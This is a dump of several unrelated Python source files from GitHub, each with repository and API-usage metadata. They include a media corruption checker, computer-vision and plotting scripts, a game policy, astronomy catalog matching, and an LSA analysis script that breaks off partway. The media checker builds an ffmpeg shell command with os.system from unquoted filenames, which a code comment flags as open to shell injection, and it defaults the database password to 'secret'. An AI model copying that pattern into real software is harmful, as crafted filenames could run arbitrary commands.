| jmvaswani/picture-sorter | sorter.py | sorter.py | py | 3,435 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "cmd_parser.parser.parse_args",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "cmd_parser.parser",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "custom_logger.initialize_logger",
"line_number": 13,
"usage_type": "call"
},
{
"ap... |
22713126804 | import os
import sys
from os import listdir
from PIL import Image
import mysql.connector as database
# Environment variables / default values
DB_HOST = os.getenv('DB_HOST', 'localhost')
DB_USER = os.getenv('DB_USER', 'root')
DB_PASSWORT = os.getenv('DB_PASSWORT', 'secret')
FILE_PATH = os.getenv('FILE_PATH', 'files')

# Sub-folders holding the uploaded media files to verify.
patharray = [FILE_PATH + "/folder1", FILE_PATH + "/folder2", FILE_PATH + "/folder3", FILE_PATH + "/folder4"]

# Connect to MariaDB Platform
try:
    connection = database.connect(
        user=DB_USER,
        password=DB_PASSWORT,
        host=DB_HOST,
        database="testdatabase"
    )
except database.Error as e:
    # Bug fix: the message was a plain string literal, so the actual error
    # was never interpolated.
    print(f"Error connecting to MariaDB Platform: {e}")
    sys.exit(1)
def Is_id_checked(id):
    """Return the filechecked flag (0/1) for the given upload id, or None
    when no matching row exists."""
    print("Check flag for Upload " + id)
    # Parameterised query: the id originates from filenames on disk, so it
    # must never be spliced directly into the SQL string.
    statement = "SELECT uploadid, filechecked FROM uploads WHERE uploadid=%s"
    cursor = connection.cursor()
    cursor.execute(statement, (id,))
    row = cursor.fetchone()
    if row is not None:
        return row[1]
def Set_id_checked(id):
    """Mark the upload with the given id as verified (filechecked = 1)."""
    print("Upload " + id + " is checked. Update flag")
    # Parameterised to match Is_id_checked and avoid SQL injection via filenames.
    statement = "UPDATE uploads SET filechecked = 1 WHERE uploadid = %s"
    cursor = connection.cursor()
    cursor.execute(statement, (id,))
    connection.commit()
def check_all():
    """Walk every configured folder, verify each not-yet-checked media file,
    and move corrupt files into the folder's "corrupt" sub-directory.

    The database flag is only set once a file passes verification; the
    upload id is the filename without its 4-character extension suffix.
    """
    for path in patharray:
        for filename in listdir(path):
            if filename == "corrupt":
                # Bug fix: skip the quarantine sub-directory itself. The old
                # `break` aborted the rest of the folder as soon as the
                # "corrupt" entry was reached.
                continue
            if Is_id_checked(filename[:-4]) == 0:
                imagepath = path + '/' + filename
                if filename.endswith('.gif') or filename.endswith('.png') or filename.endswith('.jpg'):
                    try:
                        img = Image.open(imagepath)
                        # verify() raises on truncated/corrupt image data.
                        img.verify()
                        Set_id_checked(filename[:-4])
                    except (IOError, SyntaxError) as e:
                        print('Bad file:', imagepath)
                        os.replace(path + '/' + filename, path + '/' + "corrupt/" + filename)
                if filename.endswith('.mp4'):
                    # NOTE(review): the filename is interpolated into a shell
                    # command; fine for trusted uploads, but consider
                    # subprocess.run with an argument list to avoid shell
                    # injection via crafted filenames.
                    result = os.system("ffmpeg -v error -i " + imagepath + ' -f null ' + './' + filename + ' >/dev/null 2>&1')
                    if result != 0:
                        print('Bad file:', imagepath)
                        os.replace(path + '/' + filename, path + '/' + "corrupt/" + filename)
                    else:
                        Set_id_checked(filename[:-4])

check_all()
| AnSieger/find_corrupt_media_files | checkimages.py | checkimages.py | py | 2,239 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "os.getenv",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 11,
"u... |
22189104094 | import numpy as np
import cv2 as cv
capture = cv.VideoCapture(0)
lastNorm = 0.0
lastCounter = 0
counter = 0
currentState = 0
onList = []
offList = []
onDuration = 0
offDuration = 0
if not capture.isOpened():
print("Cannot open camera")
exit()
while True:
# Capture frame-by-frame
ret, frame = capture.read()
gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
hsv = cv.cvtColor(frame,cv.COLOR_BGR2HSV)
currentNorm = np.linalg.norm(frame)
diffNorm = currentNorm - lastNorm
#print("currentNorm " ,currentNorm)
#print("diffNorm " ,diffNorm)
if (diffNorm > 20000 and currentState == 0):
currentState = 1;
print( "on - was off for " , (counter - lastCounter ), " frames and " , ((counter - lastCounter)/30) ," seconds" )
offDuration = (counter - lastCounter)/30
offList.append(offDuration)
#for v in offList:
# print(v + " ")
lastCounter = counter
if (diffNorm < -20000 and currentState == 1):
currentState = 0
print("off - was on for " ,counter - lastCounter , " frames and " , (counter - lastCounter)/30 , " seconds" )
onDuration = (counter - lastCounter)/30
onList.append(onDuration)
#for v in onList:
# print( v + " " )
lastCounter = counter
lastNorm = currentNorm
counter += 1
# Display the resulting frame
cv.imshow('frame', gray)
if cv.waitKey(1) == ord('q'):
break
# When everything done, release the capture
capture.release()
cv.destroyAllWindows()
| musaceylan/handy_codes | on_off_detector.py | on_off_detector.py | py | 1,577 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "cv2.VideoCapture",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "cv2.cvtColor",
... |
18245658241 | import pandas as pd
import dataprofiler as dp
import numpy as np
from pymongo import MongoClient
# Connect to MongoDB. Narrowed from a bare `except:`, which would also have
# swallowed KeyboardInterrupt/SystemExit.
try:
    conn = MongoClient()
except Exception:
    # Typo fix: message previously read "connct".
    print("Could not connect to Mongo DB")

db = conn.database
collection = db.my_gfg_collection

# Small demo frame with one missing value to exercise the profiler.
data = {
    "calories": [420, 380, 390, 390, 80, 350],
    "duration": [50, 45, 40, 40, np.nan, 50]
}
target_df = pd.DataFrame(data)

profile = dp.Profiler(target_df)
report = profile.report(report_options={"output_format": "pretty"})
data_stats = report["data_stats"]

collection.insert_one(data_stats)

# Collect the union of per-column stat keys, preserving first-seen order,
# and flatten each column's stats into a row.
column_list_df = []
ext_data = []
for n in data_stats:
    for col_name in n.keys():
        if col_name not in column_list_df:
            column_list_df.append(col_name)
    ext_data.append(list(n.values()))

data = pd.DataFrame(ext_data, columns=column_list_df)
# Expand the nested per-column "statistics" dicts into their own columns.
stats_df = pd.DataFrame.from_records(data.statistics.dropna().tolist())
sum_df = pd.concat([data, stats_df], axis=1)

data_stats = report["global_stats"]
print(data_stats)
print(sum_df)
| arbecker620/DataQuality | DataQuality.py | DataQuality.py | py | 1,082 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "pymongo.MongoClient",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "dataprofiler.Prof... |
12731828005 | #Visualizing data with Matplotlib
#Matplotlib config
#import matplotlib as mpl
#mpl.rcParams['lines.linewidth'] = 2
#mpl.rcParams['lines.color'] = 'r'
#plt.rcParams['figure.figsize'] = (8,4)
#plt.gcf().set_size_inches(8,4)
#example 1
import numpy as np
import pandas as pd
from datetime import date
import matplotlib.pyplot as plt
# Build 200 daily timestamps starting today, and three random-walk series.
hoy = date.today()
x = pd.period_range(hoy,periods=200,freq='d')
# PeriodIndex -> plain python datetimes so matplotlib can plot them directly.
x = x.to_timestamp().to_pydatetime()
# Cumulative sum of N(0,1) draws: shape (200, 3), one random walk per column.
y = np.random.randn(200,3).cumsum(0)
#three plots in one figure
'''
plots = plt.plot(x,y)
plt.legend(plots,('foo','bar','mongo'),loc='best',
framealpha=0.25,prop={'size':'small','family':'monospace'})
plt.gcf().set_size_inches(8,4)
plt.title('Random Trends')
plt.xlabel('Date')
plt.ylabel('Cummulative sum')
plt.grid(True)
plt.figtext(0.995,0.01,'\u00a9 Acme designs 2020',ha='right',va='bottom')
plt.tight_layout()
plt.savefig('mpl_3lines_custom.svg')
'''
# a plot insert with figure.axes
'''
fig = plt.figure(figsize=(8,4))
#Main axes
ax = fig.add_axes([0.1,0.1,0.8,0.8])
ax.set_title('Main axes with insert child axes')
ax.plot(x,y[:,0])#selects the 1st col of numpy rand y-data
ax.set_xlabel('Date')
ax.set_ylabel('Cummulative Sum')
# inserted axes
ax = fig.add_axes([0.15,0.15,0.3,0.3])
ax.plot(x,y[:,1],color='g')
ax.set_xticks([]);#removes the xticks of subplot
plt.savefig('subplots.png')
'''
# another subplot
# Three stacked axes with shared x/y scales; one random-walk series per axis.
fig, axes = plt.subplots(nrows=3,ncols=1,sharex=True,sharey=True,figsize=(8,8))
# Pair each column of y with a legend label and a line colour.
labelled_data = zip(y.transpose(),('foo','bar','mongo'),('b','g','r'))
fig.suptitle('3 random trends',fontsize=16)
for i, ld in enumerate(labelled_data):
    ax = axes[i]
    ax.plot(x, ld[0], label=ld[1], color=ld[2])
    ax.set_ylabel('Cummulative sum')
    ax.legend(loc='upper left',framealpha=0.5,prop={'size':'small'})
    ax.grid(True)
# Only the bottom axis needs the shared x label.
axes[-1].set_xlabel('Date')
fig.text(0.995,0.01,'\u00a9 Acme designs 2020',ha='right',va='bottom')
fig.tight_layout()
print('Today is',hoy)
plt.savefig('3rand_subplots.png')
| ndlopez/learn_python | source/plot_test.py | plot_test.py | py | 1,965 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "datetime.date.today",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "pandas.period_range",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.random.ra... |
7924878639 | from tools import adaptive, parse
import numpy as np
from imutils import resize
import matplotlib
import matplotlib.pyplot as plt
import cv2 as cv
import argparse
matplotlib.use('TKAgg')
# Output directory template for thresholded images.
PATH = "images/adaptive/{}"

# Map the CLI --function choice onto the local thresholding statistic.
function_map = {
    'mean': adaptive.threshold_mean,
    'median': adaptive.threshold_median
}

parser = argparse.ArgumentParser()
parser.add_argument('--filepath', '-f',
                    type=str, help=parse.HELP_FILEPATH)
parser.add_argument('--block_size', '-w', default=(3, 3),
                    type=parse.tuple_type, help=parse.HELP_WINDOW)
parser.add_argument('--function', '-fc', default='mean',
                    type=str, help=parse.HELP_FUNCTION, choices=function_map.keys())
parser.add_argument('--resize_width', '-rsz', default=400,
                    type=int, help=parse.HELP_RSZ)
parser.add_argument('--save_filename', '-svf', default=None,
                    type=str, help=parse.HELP_SAVE)

# Note: the duplicate matplotlib.use('TKAgg') call that used to live here was
# redundant - the backend is already selected right after the imports above.

if __name__ == '__main__':
    args = parser.parse_args()

    # Load as grayscale and scale to the requested width before thresholding.
    image = cv.imread(args.filepath, 0)
    image = resize(image, args.resize_width)
    adaptive_thresh = adaptive.adaptive_threshold(image, args.block_size, function_map[args.function])

    # Default output name encodes the source image, statistic and block size.
    filename = args.save_filename
    if not args.save_filename:
        filename = "{}_adaptive_block_{}_{}x{}.png"
        filename = filename.format(
            args.filepath.split("/")[-1].split(".")[0], args.function,
            args.block_size[0], args.block_size[1]
        )
    cv.imwrite(PATH.format(filename), adaptive_thresh)

    # Show original and thresholded images side by side.
    fig, ax = plt.subplots(1, 2)
    ax[0].imshow(image, cmap='gray')
    ax[1].imshow(adaptive_thresh, cmap='gray')
    plt.show()
{
"api_name": "matplotlib.use",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "tools.adaptive.threshold_mean",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "tools.adaptive",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "tools... |
17891204899 | from typing import List
from game.GameState import GameState, Move
from policy.Policy import EstimatingPolicy
from policy.exceptions import *
import random
import numpy.random
import torch
import torch.cuda
class ModelBasedPolicy(EstimatingPolicy):
    """Policy that scores candidate moves with a learned value model.

    Every legal move's successor state is featurised and run through the
    model in a single batch; the move whose successor the model scores LOWEST
    is chosen, since the successor is evaluated from the opponent's
    perspective.
    """
    def __init__(self, model, feature_extractor, h, w, exploration=0, cuda = False):
        # model: value network exposing .forward() and .name
        # feature_extractor: converts a list of game states into a feature tensor
        # h, w: board dimensions
        # exploration: probability of sampling a move instead of taking the argmin
        # cuda: when True, move feature tensors to the GPU before evaluation
        self.model = model
        self.h = h
        self.w = w
        self.exploration = exploration
        self.feature_extractor = feature_extractor
        self.name = model.name
        self.cuda = cuda
    def get_next_state_values(self, game_state: GameState):
        """Return (moves, successor states, model values) for all legal moves.

        Inference only: gradients are disabled for the forward pass.
        """
        available_moves, next_states = self.get_next_states(game_state)
        with torch.no_grad():
            features_for_all_states = self.feature_extractor.get_features(next_states).float()
            if self.cuda:
                features_for_all_states = features_for_all_states.cuda()
            v: torch.Tensor = self.model.forward(features_for_all_states)
        return available_moves, next_states, v
    def get_next_states(self, game_state):
        """Enumerate legal moves and their successor states.

        Raises:
            NoValidMovesException: when the side to move has no legal move.
        """
        available_moves: List[Move] = list(game_state.get_all_moves())
        if not available_moves:
            raise NoValidMovesException(game_state.to_move, 'No move for {}'.format(game_state.to_move))
        next_states = [game_state.get_copy_with_move(move) for move in available_moves]
        return available_moves, next_states
    def get_best_option(self, game_state: GameState):
        """Return (value, move) for the chosen move in game_state.

        With probability `exploration`, a move is instead sampled with
        probability proportional to its shifted-and-normalised value.
        """
        available_moves, next_states, v = self.get_next_state_values(game_state)
        self.pos_checked = len(next_states)
        if self.exploration:
            if random.random() < self.exploration:
                # Shift scores to be non-negative, then normalise into a
                # probability vector over the moves.
                # NOTE(review): float rounding can leave p summing to != 1,
                # which numpy.random.choice rejects - confirm this is handled.
                v.squeeze_(1)
                v = v.numpy()
                v += abs(v.min())
                v /= v.sum()
                i = numpy.random.choice(range(len(available_moves)), p=v)
                return v[i], available_moves[i]
        # we minimize quality of position for moving player (opponent) prediction of the net for next state.
        best_move_value, best_move_index = v.min(0)
        # print(best_move_value)
        return best_move_value, available_moves[int(best_move_index)]
| nkorobkov/virus-game | policy/ModelBasedPolicy.py | ModelBasedPolicy.py | py | 2,183 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "policy.Policy.EstimatingPolicy",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "game.GameState.GameState",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "torch.no_grad",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": ... |
18231210208 | import pandas as pd
from astropy.coordinates import SkyCoord
from astropy import units as u
import glob
import concurrent.futures
# Read in catalog data
# observations.txt presumably lists one survey field per row (FieldID plus
# sexagesimal RA/Dec columns used further below) - verify against the file.
catalog = pd.read_csv('observations.txt', delimiter=' ')
# Master catalog of objects to which 'i' and 'g' photometry will be added.
master_catalog = pd.read_csv('master_catalog_jan_2023.csv', delimiter=',')
print(master_catalog)
print('Starting loop...')
# Define a function to process a single field
def process_field(index):
    """Fill master_catalog row `index` with 'i' and 'g' values taken from the
    nearest sky match in the corresponding field file.

    Runs on a worker thread. NOTE(review): it mutates the shared
    master_catalog frame and field_data cache without a lock; CPython's GIL
    makes the individual operations effectively atomic in practice, but this
    is not a guaranteed contract - confirm or add locking.
    """
    # `global` here only documents intent: nothing below rebinds these names,
    # they are read or mutated in place.
    global master_catalog, catalog, field_data, master_catalog_coords, catalog_coord
    # Nearest observation field on the sky for this master-catalog object.
    idx, d2d, _ = master_catalog_coords[index].match_to_catalog_sky(catalog_coord)
    # Get the field ID and check if the corresponding file exists
    field_id = catalog.loc[idx]['FieldID']
    file_path = f'cleaned_half/c{field_id}p.ascd'
    if not glob.glob(file_path):
        print(f'Error: File not found for FieldID {field_id}')
        return
    # Read in file data (memoised per field so each file is parsed only once)
    if field_id not in field_data:
        field_data[field_id] = pd.read_csv(file_path, delimiter=' ')
    file_data = field_data[field_id]
    print('+=================+')
    print('Processing : ', field_id, '(', index, ' / ', total, ')')
    # Field-file RA is in hours, Dec in degrees (hence the hourangle unit).
    file_coords = SkyCoord(ra=file_data['RA'], dec=file_data['Dec'], unit=(u.hourangle, u.deg))
    idx, _, _ = master_catalog_coords[index].match_to_catalog_sky(file_coords)
    i_value = file_data.loc[idx, 'i']
    g_value = file_data.loc[idx, 'g']
    # Add i and g values to catalog
    master_catalog.at[index, 'i'] = i_value
    master_catalog.at[index, 'g'] = g_value
    print('Coords Processed')
# Loop over unique FieldIDs
counter = 0
master_catalog_coords = SkyCoord(ra=master_catalog['RADEG'], dec=master_catalog['DECDEG'], unit=(u.deg, u.deg))
total = len(master_catalog_coords)
ra_deg = (catalog['RAh']) * 15 + (catalog['RAm']) * 0.25 + (catalog['RAs']) * 0.00416667
dec_deg = (catalog['DEd']) + ((catalog['DEm']) / 60) + ((catalog['DEs']) / 3600)
catalog_coord = SkyCoord(ra=ra_deg * u.deg, dec=dec_deg * u.deg)
field_data = {}
# Define the number of threads to use
num_threads = 8
# Process the fields using multiple threads
with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
futures = []
for index in range(total):
future = executor.submit(process_field, index)
futures.append(future)
concurrent.futures.wait(futures)
# Write out updated catalog
print('Outputting to csv')
master_catalog.to_csv('cleaned_half/master_updated.csv', index=False)
print('Done!')
| WilliamOrringe/Indentifying-Candidate-Star-Clusters-in-M31 | multi.py | multi.py | py | 2,519 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "pandas.read_csv",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "glob.glob",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_n... |
71648693307 | #!/usr/bin/env python3
import asyncio
import socket
from keyword import kwlist
from typing import Tuple as tuple
MAX_KEYWORD_LEN = 4 # <1>
async def probe(domain: str) -> tuple[str, bool]: # <2>
loop = asyncio.get_running_loop() # <3>
try:
await loop.getaddrinfo(domain, None) # <4>
except socket.gaierror:
return (domain, False)
return (domain, True)
async def main() -> None: # <5>
names = (kw for kw in kwlist if len(kw) <= MAX_KEYWORD_LEN) # <6>
domains = (f'{name}.dev'.lower() for name in names) # <7>
coros = [probe(domain) for domain in domains] # <8>
for coro in asyncio.as_completed(coros): # <9>
# 这里coro已经是完成的了,为什么还要await,去掉会报错的,可能是解包相关的问题。
# 原文解释:the await expression will not block but we need it to get the
# result from coro. If coro raised an unhandled exception,
# it would be re-raised
# here.
domain, found = await coro # <10>
mark = '+' if found else ' '
print(f'{mark} {domain}')
if __name__ == '__main__':
asyncio.run(main()) # <11>
| yangguang8112/fluentPy | new_chapter18/21-async/domains/asyncio/blogdom.py | blogdom.py | py | 1,205 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "asyncio.get_running_loop",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "socket.gaierror",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "typing.Tuple",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "keyword.kw... |
38931021069 | from typing import Callable
from PySide2.QtWidgets import QListWidget, QAbstractItemView, QAction, QPushButton, QListWidgetItem, QGridLayout
from PySide2.QtCore import QSize, QThread, Signal, Slot, Qt
import damaker
from damaker.pipeline import *
import damaker_gui
import damaker_gui.widgets as widgets
class PipelineWidget(QListWidget, widgets.ITabWidget):
name: str = "Pipeline"
icon: str = u":/flat-icons/icons/flat-icons/timeline.svg"
def __init__(self, parent=None, operations=[]):
super().__init__(parent)
self.setSpacing(3)
self.setDragDropMode(QAbstractItemView.InternalMove)
self.setVerticalScrollMode(QListWidget.ScrollMode.ScrollPerPixel)
self.setContextMenuPolicy(Qt.ActionsContextMenu)
act = QAction("Remove", self)
act.triggered.connect(self.removeOperation)
self.addAction(act)
for op in operations:
self.addOperation(op)
self.pipelineThread = PipelineRunnerThread()
def tabEnterFocus(self):
damaker_gui.MainWindow.Instance.operationList.connectPipeline(self)
def tabExitFocus(self):
damaker_gui.MainWindow.Instance.operationList.disconnectPipeline(self)
def runPipeline(self):
self.pipelineThread.setPipeline(self)
self.pipelineThread.stopped.connect(self.stopPipeline)
self.pipelineThread.start()
# self.pipelineThread.run()
def stopPipeline(self):
self.pipelineThread.terminate()
print("(Pipeline ended 🟡)")
def addOperation(self, op: Operation):
print(f"Operation '{op.name}' added ✔")
item = QListWidgetItem(op.name)
item.op = op.copy()
self.addItem(item)
# op_widget = widgets.OperationWidget(op=op, pipeline=self, layoutType=QGridLayout, batchMode=True)
# item.setSizeHint(QSize(op_widget.width(), op_widget.height()))
def addOpfromFunc(self, func: Callable):
self.addOperation(Operation(func, [], func.__name__))
def removeOperation(self):
self.takeItem(self.currentRow())
class PipelineRunnerThread(QThread):
stopped = Signal()
def __init__(self, pipeline: PipelineWidget=None):
super(PipelineRunnerThread, self).__init__()
self.pipeline = pipeline
def setPipeline(self, pipeline: PipelineWidget):
self.pipeline = pipeline
@Slot()
def run(self):
if self.pipeline is None:
pass
self.setPriority(QThread.HighPriority)
operations: list[widgets.OperationWidget] = []
for i in range(self.pipeline.count()):
# operations.append(self.pipeline.itemWidget(self.pipeline.item(i)))
operations.append(self.pipeline.item(i).op)
print("[Starting Pipeline 🚀]")
step = 1
for op in operations:
if not op.enabled:
continue
print(f'-- [{step}] âž¡ {op.name} --')
op.run()
step += 1
print("[Pipeline finished 🟢]")
self.stopped.emit()
| subski/DAMAKER | damaker_gui/widgets/PipelineWidget.py | PipelineWidget.py | py | 3,049 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "PySide2.QtWidgets.QListWidget",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "damaker_gui.widgets.ITabWidget",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "damaker_gui.widgets",
"line_number": 11,
"usage_type": "name"
},
{
... |
1140042349 | import compcore
from joblib import Parallel, delayed
import multiprocessing
import numpy as np
import scipy as sp
import h5py
import sys, csv, re, os, time, argparse, string, tempfile
try:
import lsalib
except ImportError:
from lsa import lsalib
def main():
parser = argparse.ArgumentParser()
arg_precision_default=1000
arg_delayLimit_default=0
parser.add_argument("dataFile", metavar="dataFile", type=argparse.FileType('r'), \
help="the input data file,\n \
m by (r * s)tab delimited text; top left cell start with \
'#' to mark this is the header line; \n \
m is number of variables, r is number of replicates, \
s it number of time spots; \n \
first row: #header s1r1 s1r2 s2r1 s2r2; \
second row: x ?.?? ?.?? ?.?? ?.??; for a 1 by (2*2) data")
parser.add_argument("resultFile", metavar="resultFile", type=argparse.FileType('w'), \
help="the output result file")
parser.add_argument("-e", "--extraFile", dest="extraFile", default=None, \
type=argparse.FileType('r'),
help="specify an extra datafile, otherwise the first datafile will be used \n \
and only lower triangle entries of pairwise matrix will be computed")
parser.add_argument("-d", "--delayLimit", dest="delayLimit", default=arg_delayLimit_default, type=int,\
help="specify the maximum delay possible, default: {},\n \
must be an integer >=0 and <spotNum".format(arg_delayLimit_default))
parser.add_argument("-m", "--minOccur", dest="minOccur", default=50, type=int,
help="specify the minimum occurence percentile of all times, default: 50,\n")
parser.add_argument("-r", "--repNum", dest="repNum", default=1, type=int,
help="specify the number of replicates each time spot, default: 1,\n \
must be provided and valid. ")
parser.add_argument("-s", "--spotNum", dest="spotNum", default=4, type=int,
help="specify the number of time spots, default: 4,\n \
must be provided and valid. ")
parser.add_argument("-p", "--pvalueMethod", dest="pvalueMethod", default="perm", \
choices=["perm", "theo", "mix"],
help="specify the method for p-value estimation, \n \
default: pvalueMethod=perm, i.e. use permutation \n \
theo: theoretical approximaton; if used also set -a value. \n \
mix: use theoretical approximation for pre-screening \
if promising (<0.05) then use permutation. ")
parser.add_argument("-x", "--precision", dest="precision", default=arg_precision_default, type=int,\
help="permutation/precision, specify the permutation \n \
number or precision=1/permutation for p-value estimation. \n \
default is {}, must be an integer >0 ".format(arg_precision_default) )
parser.add_argument("-b", "--bootNum", dest="bootNum", default=0, type=int, \
choices=[0, 100, 200, 500, 1000, 2000],
help="specify the number of bootstraps for 95%% confidence \
interval estimation, default: 100,\n \
choices: 0, 100, 200, 500, 1000, 2000. \n \
Setting bootNum=0 avoids bootstrap. \n \
Bootstrap is not suitable for non-replicated data.")
parser.add_argument("-t", "--transFunc", dest="transFunc", default='simple', \
choices=['simple', 'SD', 'Med', 'MAD'],\
help="specify the method to summarize replicates data, default: simple, \n \
choices: simple, SD, Med, MAD \n \
NOTE: \n \
simple: simple averaging \n \
SD: standard deviation weighted averaging \n \
Med: simple Median \n \
MAD: median absolute deviation weighted median;" )
parser.add_argument("-f", "--fillMethod", dest="fillMethod", default='none', \
choices=['none', 'zero', 'linear', 'quadratic', 'cubic', 'slinear', 'nearest'], \
help="specify the method to fill missing, default: none, \n \
choices: none, zero, linear, quadratic, cubic, slinear, nearest \n \
operation AFTER normalization: \n \
none: fill up with zeros ; \n \
operation BEFORE normalization: \n \
zero: fill up with zero order splines; \n \
linear: fill up with linear splines; \n \
slinear: fill up with slinear; \n \
quadratic: fill up with quadratic spline; \n \
cubic: fill up with cubic spline; \n \
nearest: fill up with nearest neighbor")
parser.add_argument("-n", "--normMethod", dest="normMethod", default='robustZ', \
choices=['percentile', 'percentileZ', 'pnz', 'robustZ', 'rnz', 'none'], \
help="must specify the method to normalize data, default: robustZ, \n \
choices: percentile, none, pnz, percentileZ, robustZ or a float \n \
NOTE: \n \
percentile: percentile normalization, including zeros (only with perm)\n \
pnz: percentile normalization, excluding zeros (only with perm) \n \
percentileZ: percentile normalization + Z-normalization \n \
rnz: percentileZ normalization + excluding zeros + robust estimates (theo, mix, perm OK) \n \
robustZ: percentileZ normalization + robust estimates \n \
(with perm, mix and theo, and must use this for theo and mix, default) \n")
parser.add_argument("-q", "--qvalueMethod", dest="qvalueMethod", \
default='scipy', choices=['scipy'],
help="specify the qvalue calculation method, \n \
scipy: use scipy and storeyQvalue function, default \n \
")
#R: use R's qvalue package, require X connection")
parser.add_argument("-T", "--trendThresh", dest="trendThresh", default=None, \
type=float, \
help="if trend series based analysis is desired, use this option \n \
NOTE: when this is used, must also supply reasonble \n \
values for -p, -a, -n options")
parser.add_argument("-a", "--approxVar", dest="approxVar", default=1, type=float,\
help="if use -p theo and -T, must set this value appropriately, \n \
precalculated -a {1.25, 0.93, 0.56,0.13 } for i.i.d. standard normal null \n \
and -T {0, 0.5, 1, 2} respectively. For other distribution \n \
and -T values, see FAQ and Xia et al. 2013 in reference")
parser.add_argument("-v", "--progressive", dest="progressive", default=0, type=int,
help="specify the number of progressive output to save memory, default: 0,\n \
2G memory is required for 1M pairwise comparison. ")
arg_namespace = parser.parse_args()
fillMethod = vars(arg_namespace)['fillMethod']
normMethod = vars(arg_namespace)['normMethod']
qvalueMethod = vars(arg_namespace)['qvalueMethod']
pvalueMethod = vars(arg_namespace)['pvalueMethod']
precision = vars(arg_namespace)['precision']
transFunc = vars(arg_namespace)['transFunc']
bootNum = vars(arg_namespace)['bootNum']
approxVar = vars(arg_namespace)['approxVar']
trendThresh = vars(arg_namespace)['trendThresh']
progressive = vars(arg_namespace)['progressive']
delayLimit = vars(arg_namespace)['delayLimit']
minOccur = vars(arg_namespace)['minOccur']
dataFile = vars(arg_namespace)['dataFile'] #dataFile
extraFile = vars(arg_namespace)['extraFile'] #extraFile
resultFile = vars(arg_namespace)['resultFile'] #resultFile
repNum = vars(arg_namespace)['repNum']
spotNum = vars(arg_namespace)['spotNum']
try:
extraFile_name = extraFile.name
except AttributeError:
extraFile_name = ''
assert trendThresh==None or trendThresh>=0
if transFunc == 'SD':
fTransform = lsalib.sdAverage
elif transFunc == 'Med':
fTransform = lsalib.simpleMedian
elif transFunc == 'MAD':
fTransform = lsalib.madMedian
else:
fTransform = lsalib.simpleAverage
if repNum < 5 and transFunc == 'SD':
print("Not enough replicates for SD-weighted averaging, fall back to simpleAverage", file=sys.stderr)
transFunc = 'simple'
if repNum < 5 and transFunc == 'MAD':
print("Not enough replicates for Median Absolute Deviation, fall back to simpleMedian", file=sys.stderr)
transFunc = 'Med'
if normMethod == 'none':
zNormalize = lsalib.noneNormalize
elif normMethod == 'percentile':
zNormalize = lsalib.percentileNormalize
elif normMethod == 'percentileZ':
zNormalize = lsalib.percentileZNormalize
elif normMethod == 'robustZ':
zNormalize = lsalib.robustZNormalize
elif normMethod == 'pnz':
zNormalize = lsalib.noZeroNormalize
elif normMethod == 'rnz':
zNormalize = lsalib.robustNoZeroNormalize
else:
zNormalize = lsalib.percentileZNormalize
start_time = time.time()
col = spotNum
total_row_0 = 0
total_row_1 = 0
block = 2000
first_file = "first_file.txt"
second_file = "second_file.txt"
with open(first_file, 'r') as textfile:
next(textfile)
for line in textfile:
total_row_0 += 1
with open(second_file, 'r') as textfile:
next(textfile)
for line in textfile:
total_row_1 += 1
i_m = 0
j_m = 0
start_0 = 1
end_0 = block
start_1 = 1
end_1 = block
if end_0 >= total_row_0:
end_0 = total_row_0
if end_1 >= total_row_1:
end_1 = total_row_1
manager = multiprocessing.Manager()
first_Data = manager.list()
second_Data = manager.list()
while i_m * block < total_row_0:
i_m += 1
skip_header = start_0
skip_footer = total_row_0 - end_0
firstData = np.genfromtxt(first_file, comments='#', delimiter='\t',missing_values=['na', '', 'NA'], filling_values=np.nan,usecols=range(1,spotNum*repNum+1), skip_header=skip_header, skip_footer=skip_footer)
if len(firstData.shape) == 1:
data = np.array([firstData])
firstFactorLabels = np.genfromtxt(first_file, comments='#', delimiter='\t', usecols=range(0,1), dtype='str', skip_header=skip_header, skip_footer=skip_footer).tolist()
if type(firstFactorLabels)==str:
firstFactorLabels=[firstFactorLabels]
factorNum = firstData.shape[0]
tempData=np.zeros( ( factorNum, repNum, spotNum), dtype='float' )
for i in range(0, factorNum):
for j in range(0, repNum):
try:
tempData[i,j] = firstData[i][np.arange(j,spotNum*repNum,repNum)]
except IndexError:
print("Error: one input file need more than two data row or use -e to specify another input file", file=sys.stderr)
quit()
